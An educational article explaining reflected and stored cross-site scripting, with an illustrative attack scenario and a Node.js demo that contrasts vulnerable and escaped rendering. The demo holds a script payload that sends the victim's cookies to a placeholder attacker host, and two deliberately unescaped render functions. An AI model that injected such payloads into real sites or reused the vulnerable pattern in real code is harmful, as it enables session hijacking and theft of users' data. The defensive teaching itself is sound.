What is XSS and how does it work?
Cross-Site Scripting (XSS) is a type of code injection attack. An attacker carries out XSS by injecting HTML or client-side script code into a site. To the victim's browser, the injected code appears to come from that site, so it runs with the site's privileges. Among other things, this lets the attacker bypass client-side security controls, obtain sensitive information, or plant malicious content in the application.
Why is Cross-Site Scripting abbreviated XSS instead of CSS? Because the abbreviation CSS is already taken by Cascading Style Sheets.
Still confused about what an XSS script looks like? See HERE.
1. Reflected XSS
Reflected XSS is the most common type of XSS and the easiest for an attacker to carry out. The attacker uses social engineering to get the user to click a link that carries malicious code; the site then reflects that code back in its response. In this way the attacker can obtain the user's cookie, which can be used afterwards to hijack the user's session.
The defence against this attack is to validate input and, above all, to encode (escape) user-supplied data for the context it is displayed in before any of it is written into the page. Do not trust any data sent by the user.
An example of an attack using XSS (the names I use here are fictional):
1. Toni often visits Jack's website, which lets Toni log in with a username and password and store personal data or transaction data that should not be known to others.
2. Rey knows that Toni often visits that site, and examines Jack's website for a vulnerability or weakness that can be attacked using XSS.
3. Rey finds the weakness, writes a malicious script, and embeds it in a URL pointing at Jack's site.
4. Rey then sends Toni an email containing a link to a page on Jack's website; the URL already carries the embedded malicious script, and Rey persuades Toni to click it with a false pretext or the like.
5. When Toni clicks the URL, Toni lands on Jack's website and the script Rey created runs in Toni's browser, so Rey can take the data from Toni's cookies and use it.
2. Stored XSS
Stored XSS is encountered less often, but its impact is large: a single stored XSS attack can affect every user of the site. Stored XSS occurs when a user is allowed to enter data that is saved and later displayed back to other users, for example on a message board or in a guest book. The attacker puts HTML code or other client-side script code into their post, and it runs in the browser of everyone who views it.
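The following is an added example, not code from the original article: a miniature version of "Jack's website" written for Node.js, showing the reflected case from the scenario above (a search term from the URL echoed into the page) and the stored case from this section (a guest book shown to every visitor), each once with the bug and once with the fix. The host names jack.example and rey.example, the cookie-stealing payload, and the function names are assumptions made for the illustration.

```javascript
// Added example (not from the original article). Run with: node xss_demo.js
// Host names, payload and function names below are illustrative assumptions.

// HTML-escape user-supplied text for element content and double-quoted
// attribute values. This is the fix the article calls for: never trust data
// sent by the user, encode it before displaying it.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Illustrative payload of the kind Rey would embed: it sends the victim's
// cookies to a host the attacker controls (rey.example is made up).
const PAYLOAD =
  "<script>new Image().src='https://rey.example/c?'+document.cookie</script>";

// --- Reflected XSS: the search term from the URL is echoed into the page ---

// Vulnerable: the query parameter is concatenated straight into the HTML.
function renderSearchVulnerable(url) {
  const q = new URL(url).searchParams.get('q') || '';
  return `<h1>Results for: ${q}</h1>`;
}

// Fixed: the same page, with the parameter HTML-escaped on output.
function renderSearchSafe(url) {
  const q = new URL(url).searchParams.get('q') || '';
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}

// --- Stored XSS: guest-book entries are saved and shown to every visitor ---

// `store` is an array standing in for the site's database.
function postMessage(store, author, text) {
  store.push({ author, text }); // stored exactly as submitted
}

// Vulnerable: every later visitor receives the attacker's script.
function renderGuestBookVulnerable(store) {
  return store.map((m) => `<li><b>${m.author}</b>: ${m.text}</li>`).join('\n');
}

// Fixed: encode on output, so the stored text is shown as text.
function renderGuestBookSafe(store) {
  return store
    .map((m) => `<li><b>${escapeHtml(m.author)}</b>: ${escapeHtml(m.text)}</li>`)
    .join('\n');
}

// Crude check used below: does the rendered HTML contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The link Rey mails to Toni in the scenario (jack.example is made up).
const maliciousLink =
  'https://jack.example/search?q=' + encodeURIComponent(PAYLOAD);

// Demo run: reflected case.
console.log('Reflected, vulnerable:', renderSearchVulnerable(maliciousLink));
console.log('Reflected, fixed:     ', renderSearchSafe(maliciousLink));

// Demo run: stored case. Alice's post is harmless; Rey's carries the payload.
const demoBook = [];
postMessage(demoBook, 'alice', 'Nice site!');
postMessage(demoBook, 'rey', PAYLOAD);
console.log('\nStored, vulnerable:\n' + renderGuestBookVulnerable(demoBook));
console.log('\nStored, fixed:\n' + renderGuestBookSafe(demoBook));
```

Two caveats worth keeping in mind when applying this: escaping is context-dependent, so the HTML escaping above is only correct when the value lands in element content or a quoted attribute, not inside a `<script>` block, a URL or an event handler; and marking the session cookie `HttpOnly` stops `document.cookie` from reading it, which blunts the cookie-theft step in the scenario but does not remove the XSS itself.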
That is this article on understanding XSS. I hope it is easy to follow, and don't forget to comment below.